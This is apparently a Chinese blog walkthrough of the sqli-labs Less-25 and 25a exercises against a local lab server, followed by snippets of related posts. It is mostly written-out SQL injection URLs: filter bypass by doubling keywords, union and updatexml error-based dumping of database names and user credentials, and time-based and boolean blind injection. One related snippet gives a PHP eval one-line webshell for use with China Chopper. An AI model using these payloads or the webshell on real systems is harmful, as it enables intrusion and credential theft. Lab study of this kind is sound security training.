sqli lab 25 25a

Waf绕过可大致分为三类:  1.白盒绕过
                                             2. 黑盒绕过
                                             3. fuzz测试

less  25  法一 union 双写绕过过滤

http://192.168.50.100/sqli/Less-25/?id=1

http://192.168.50.100/sqli/Less-25/?id=1‘

http://192.168.50.100/sqli/Less-25/?id=1‘ -- +  闭合 返回正常

提示语句

使用order by 2-- 猜列数

查看源码  发现 or和and  都被替换成了空

采用双写得方式 进行绕过~

http://192.168.50.100/sqli/Less-25/?id=1‘  Oorrder by 2  -- +

http://192.168.50.100/sqli/Less-25/?id=-1‘ union select 1,2,3--+   判断回显位置

http://192.168.50.100/sqli/Less-25/?id=-1‘  union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata--+ 查到库

infoorrmation   双写 绕过
http://192.168.50.100/sqli/Less-25/?id=-1 ’ union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name=0x7573657273--+ 查到字段
http://192.168.50.100/sqli/Less-25/?id=-1 ‘ union select 1,2,group_concat(concat_ws(0x7e,username,passwoorrd)) from security.users--+ 查到字段值

less25 法二

or->|| 基于报错的注入

http://192.168.50.100/sqli/Less-25/?id=-1‘ ||  ‘1‘=‘1

使用报错注入

http://192.168.50.100/sqli/Less-25/?id=-1‘  || updatexml(1,concat(0x7e,(database()),0x7e),1)--+ 爆出当前数据库

http://192.168.50.100/sqli/Less-25/?id=-1‘  || updatexml(1,concat(0x7e,(select schema_name from infoorrmation_schema.schemata limit 0,1),0x7e),1)--+

遍历爆出所有的数据,继续使用即可,这里不可以使用group_concat(),因为数据显示不完整

less25a

此时页面发生显著变化,数据消失,说明存在注入,但是通过$sql语句得知,此处并没有将id值进行包裹

http://192.168.50.100/sqli/Less-25a/?id=1  OoRrder by 3 --+

http://192.168.50.100/sqli/Less-25a/?id=-1 union select 1,2,3 --+    判断回显位置       id= 1 和 id= -1 得区别如下

http://192.168.50.100/sqli/Less-25a/?id=-1 union select 1,2,3--+ 可以使用联合查询,当我们使用联合查询注入时:
 http://192.168.50.100/sqli/Less-25a/?id=-1 union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata--+ 查到库
 http://192.168.50.100/sqli/Less-25a/?id=-1 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name=0x7573657273--+ 查到字段
 http://192.168.50.100/sqli/Less-25a/?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,passwoorrd)) from security.users--+ 查到字段值

25a  还有其他得方法

当我们使用基于时间的布尔盲注:
 http://192.168.50.100/sqli/Less-25a/?id=-1 oorr if(length(database())>1,1,sleep(5))--+ 可以通过这个判断当前数据库长度
 http://192.168.50.100/sqli/Less-25a/?id=-1 oorrif(left(database(),1)>‘a’,1,sleep(5))--+ 判断当前数据库的组成
 http://192.168.50.100/sqli/Less-25a/?id=-1 oorr if(left((select schema_name from infoorrmation_schema.schemata limit 0,1),1)>‘a’,1,sleep(5))--+ 通过这个判断所有的数据库
依次再进行下去。。。

当我们使用布尔盲注的时候:
 http://192.168.50.100/sqli/Less-25a/?id=-1 oorr length(database())>1--+ 此时页面返回正常,则得知当前的数据库长度是大于1的
 http://192.168.50.100/sqli/Less-25a/?id=-1 oorr left((select schema_name from infoorrmation_schema.schemata limit 0,1),1)>‘a’--+当前的页面返回正常,说明此时的第一个数据库的第一个字母是大于a的
 http://192.168.50.100/sqli/Less-25a/?id=-1 oorr left((select schema_name from infoorrmation_schema.schemata limit 0,1),1)=‘a’--+ 此时等于a的时候,页面返回异常,说明我们的语句写的是正确的。
依次再进行下去。。。

通过观察,25关   ‘’   包裹,25a没有任何包裹,并且也是转义or和and

原文地址:https://www.cnblogs.com/xingyuner/p/12238982.html

时间: 2024-10-16 21:40:46

sqli lab 25 25a的相关文章

SQL报错注入结合sqli lab和百度杯CTF VId

0x00 背景 学习记录一下报错型的注入,经各方整理和自己总结形成. 所有的注入原理都是一样,即用户输入被拼接执行.但后台数据库执行语句产生错误并回显到页面时即可能存在报错注入. 0x01概念 报错型注入的利用大概有以下3种方式: 1:?id=2' and (select 1 from (select count(*),concat( floor(rand(0)*2),(select (select (查询语句)) from information_schema.tables limit 0,1

SQLi Lab的视频教程和文字教程

SQLi Lab 系列的文字和视频(需要翻墙),讲解的很好 SQLi Lab Series - Introduction SQLi Lab Series - Error Based SQLi Lab Series - Double Query / SubQuery SQLi Lab Series - Blind Injection - Boolean Based SQLi Lab Series - Blind Injection - Time Based SQLi Lab Series - Us

sqli lab less7

Less7 1.文件读写权限问题 show variables like '%secure%';查看 secure-file-priv 当前的值,如果显示为NULL,则需要打开 C:\phpstudy\PHPTutorial\MySQL\my.ini文件,在其中加上一句:secure_file_priv=“/”. 重启服务再show  就显示了 2一句话木马:php版本:<?php @eval($_POST[“crow”]);?> 其中crow是密码 一句话木马大多配合中国菜刀使用,菜刀的使用

sqli lab 23 、24

less23  法1 输入用户名和密码  admin ~~admin http://192.168.50.100/sqli/Less-23/?id=1'     ‘报错  说明有注入漏洞 23关和第1关很像,但是观察代码发现他对--+和#都进行了转义,不能再用这种方式注释,将--+  和 #都进行了替换 替换成了空格 可以用新的注释符:   “   ;%00   ”  或者and和or语句进行闭合 http://192.168.50.100/sqli/Less-23/?id=1' ;%00 判断

sqli lab 11-12

查库: select schema_name from information_schema.schemata;查表: select table_name from information_schema.tables where table_schema='security';查列: select column_name from information_schema.columns where table_name='users';查字段: select username,password f

sqli lab 38-45

less38Stacked injections:堆叠注入.从名词的含义就可以看到应该是一堆sql语句(多条)一起执行. 而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ;表示语句结束. 这样我们就想到了是不是可以多句一起使用.这个叫做stacked injection.我们可以在mysql命令行中进行测试: Select * from users; create table test1 like users;Show tables;Select * fro

思科资料的所有资料目录

1.20140819单臂路由.pdf 2.CCNA 实验手册之Packet_Tracer使用教程.pdf 3.CCNA_Lab_Workbook_Sample_Labs(CDP,静态路由,端口安全).pdf 4.CCNA.CCNP.CCIE案例实战手册(交换部分).pdf 5.CCNA.CCNP.CCIE案例实战手册(路由部分).pdf 6.CCNA帧中继解法.pdf 7.CCNA级别的实际企业环境 综合实验.ppt 10.hsrp.pkt 11.CCNA_2010年5月(23个实验)最新实验总

7 天玩转 ASP.NET MVC — 第 5 天

目录 第 1 天 第 2 天 第 3 天 第 4 天 第 5 天 第 6 天 第 7 天 0. 前言 欢迎来到第五天的学习.希望第一天到第四天的学习,你都是开心的. 1. Lab 22 - 增加 Footer 在这个实验中,我们将会向 Employee 页面添加 Footer.本次实验的目标是理解分部视图(Partial Views). 什么是「Partial Views」? 逻辑上讲,分部视图(Partial Views) 是一个可重用的视图,它不会被直接显示.它会被其它视图所包含,然后作为该

各种Web漏洞测试平台

Sqli Lab?支持报错注入.二次注入.盲注.Update注入.Insert注入.Http头部注入.二次注入练习等.支持GET和POST两种方式. https://github.com/Audi-1/sqli-labs DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序.包含了SQL注入.XSS.盲注等常见的一些安全漏洞.http://www.dvwa.co.uk/ mutilli